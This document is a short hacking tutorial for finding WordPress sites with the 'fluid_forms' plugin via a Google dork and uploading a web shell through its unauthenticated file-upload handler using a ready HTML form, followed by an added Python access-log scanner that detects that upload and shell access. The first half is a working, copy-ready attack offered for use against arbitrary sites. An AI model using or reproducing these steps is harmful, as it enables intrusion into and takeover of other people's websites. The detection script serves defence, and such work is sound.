Dork: inurl:fluid_forms
. Enter the dork into the Google search box
. Pick a target, then append the exploit path. Example:
target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/
(Look for one that is vulnerable)
CSRF:
<form method="POST" action="http://target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
* replace target.co.li -> the URL of your target site
* save as: .html
. Once that is done, open the CSRF file in your web browser, then upload the file/shell you want to upload to the target site :p
(For the rest, use your imagination, to find ones that are vulnerable and untouched)
Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/
. Shell access: /wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php
Messy tutorial? Whatever :v I'm sleepy..
That's all
-MrHun74 (member from outside the gc)
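
Seen from the server side, the steps above leave two request patterns in the access log: a POST to the plugin's upload handler, and a later request for a script file under its files/ directory. The following log check is an added example, not part of the original post; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Handler path as given on the page; log format and names below are assumptions.
HANDLER = "/wp-content/plugins/fluid_forms/file-upload/server/php"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Apache/nginx "combined" access log line: ip, method, target, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "POST {HANDLER}/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET {HANDLER}/files/photo.jpg HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    f'198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "POST {HANDLER}/ HTTP/1.1" 403 199 "-" "curl/8.0"',
    f'198.51.100.9 - - [01/Jan/2024:10:02:05 +0000] "GET {HANDLER}/files/a%2Ephp?x=1 HTTP/1.1" 404 0 "-" "curl/8.0"',
]

def classify(line):
    """Return (client_ip, finding, normalized_path) or None for benign lines."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    # Drop the query string, percent-decode, then collapse duplicate slashes
    # and dot segments so variants such as /wp-content//plugins// still match.
    raw = unquote(target.split("?", 1)[0])
    path = normpath("/" + raw.lstrip("/")).lower()
    if path in (HANDLER, HANDLER + "/index.php"):
        if method != "POST":
            return None
        # A 2xx answer means the handler processed the POST at all.
        kind = "upload-post-2xx" if status.startswith("2") else "upload-post-other"
        return ip, kind, path
    if path.startswith(HANDLER + "/files/") and SCRIPT_EXT.search(path):
        # A script under files/ answering 200 deserves immediate triage.
        kind = "script-served" if status == "200" else "script-probe"
        return ip, kind, path
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, kind, path in scan(SAMPLE):
        print(f"{kind:18} {ip:15} {path}")
```

A "script-served" finding from the same client shortly after an "upload-post-2xx" finding is the pair to prioritise; blocking script execution under files/ at the web server and removing the plugin's upload handler address the cause.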